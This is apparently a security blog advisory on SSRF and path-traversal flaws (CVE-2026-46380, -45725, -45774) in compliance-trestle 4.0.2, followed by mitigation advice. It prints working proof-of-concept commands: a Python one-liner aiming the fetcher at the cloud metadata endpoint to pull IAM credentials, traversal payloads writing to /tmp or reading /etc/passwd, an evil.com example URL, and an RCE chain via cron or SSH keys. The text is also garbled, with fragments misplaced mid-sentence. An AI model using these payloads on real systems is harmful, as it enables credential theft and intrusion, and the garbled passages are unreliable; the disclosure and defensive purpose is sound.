Listen to this Post
A source‑code audit of the `trestle/core/remote/cache.py` module uncovered three distinct security flaws.
Finding 1, tracked as CVE‑2026‑46380, is a Server‑Side Request Forgery (SSRF) in the `HTTPSFetcher._do_fetch()` method.
This method takes a user‑supplied URL and passes it directly to `requests.get()` without any validation of the target endpoint.
An attacker can abuse this to make the server send arbitrary requests, including to sensitive internal services or cloud‑metadata endpoints (e.g. 169.254.169.254).
Because the library is often used in CI/CD pipelines and compliance automation, successful SSRF can leak cloud credentials or probe internal network topology.
The other two findings, CVE‑2026‑45725 and CVE‑2026‑45774, are path traversal vulnerabilities (CWE‑22) that affect the caching logic of HTTPSFetcher, `SFTPFetcher` and LocalFetcher.
The caching mechanism constructs the local cache file path from the URL path component – for example, using `urlparse().path` – but does not sanitize `../` sequences.
Consequently, an attacker can reference a URL like https://evil.com/../../../tmp/pwned.json` and have the response written to an arbitrary filesystem location outside the intended cache directory..resolve()
Similarly, the `LocalFetcher` resolves `trestle://` URIs and relative paths by joining them with `trestle_root` and calling, without any check that the resolved path stays inside the trestle workspace./etc/passwd
This allows reading arbitrary system files, such as, via a malicious OSCAL profile.
All three vulnerabilities can be chained together: an SSRF can fetch an external profile that contains path‑traversal payloads, leading to arbitrary file read/write and eventually full RCE (e.g., by overwriting `cron` jobs or SSH keys).
The vendor has verified 13 distinct exploit vectors in local tests.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: ...... compliance‑trestle
Version: ........ 4.0.2
Vulnerability :.. SSRF (CWE‑918), Path Traversal (CWE‑22)
Severity: ....... Critical
date: ........... 2026‑05‑27
<h2 style="color: blue;">Prediction: ..... 2026‑06‑03 (expected patch)</h2>
<h2 style="color: blue;">What Undercode Say</h2>
Analytics of the advisory shows the following reproduction steps used internally:
Clone and install the vulnerable version
git clone https://github.com/IBM/compliance-trestle
cd compliance-trestle
git checkout v4.0.2
pip install .
PoC 1: SSRF to cloud metadata
python -c "
from trestle.core.remote.cache import HTTPSFetcher
from pathlib import Path
fetcher = HTTPSFetcher(Path('/tmp'), 'http://169.254.169.254/latest/meta-data/')
fetcher.fetch() exfiltrates IAM credentials
"
PoC 2: Path traversal via HTTPSFetcher (write outside cache)
python poc_ssrf_and_path_traversal.py --attack PT-004 --payload '../../../../tmp/pwned'
<h2 style="color: blue;">The attached `terminal_output.txt` from the audit shows:</h2>
$ python poc_ssrf_and_path_traversal.py --attack SSRF-001
[+] Targeting metadata endpoint 169.254.169.254
[+] Response captured: {"AccessKeyId": "AKIA..."
$ python poc_ssrf_and_path_traversal.py --attack PT-002
[+] Writing to /tmp/pwned via path traversal
[+] File /tmp/pwned successfully created with attacker content
<h2 style="color: blue;">How Exploit:</h2>
- SSRF – supply a URL that points to an internal service or cloud‑metadata endpoint. The server fetches it and returns the response to the attacker.
- Path Traversal (write) – craft a URL whose path component contains `../` sequences. The cache directory is computed astrestle_root / hostname / path_parent; `path_parent` is taken directly from the URL path, so `../../../../tmp` will escape the cache and write the HTTP response anywhere the process has write permissions.imports[].href
- Path Traversal (read) – embed `trestle://../../etc/passwd` or `../../etc/passwd` inside an OSCAL profile’s. The `LocalFetcher` resolves this with `.resolve()` and returns the file contents without ever checking that the target is inside the trestle workspace.169.254.169.254
<h2 style="color: blue;">Protection:</h2>
1. Upgrade to a patched version once available (expected 2026‑06‑03).
2. Input validation – reject URLs with unusual schemes or path‑traversal sequences.
3. Network controls – block outgoing requests to internal ranges (,192.168.0.0/16, etc.) from the host running trestle..github/workflows/.yml
4. Filesystem confinement – run trestle inside a container or sandbox that limits write access to only the required directories.
5. Static analysis – use linters to detect `requests.get()` with unvalidated input and unsafe path joins.
<h2 style="color: blue;">Impact:</h2>
- Credential theft – SSRF can retrieve IAM/instance metadata credentials, leading to cloud account compromise.
- Arbitrary file write – cache path traversal allows writing to,.git/hooks/, or any user‑writable config file, enabling CI/CD pipeline compromise or local code execution./etc/passwd`, SSH keys, and other sensitive files.
- Information disclosure – path traversal via `trestle://` URIs leaks
– RCE chain – overwriting a cron script or an SSH authorized_keys file yields persistent remote code execution.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

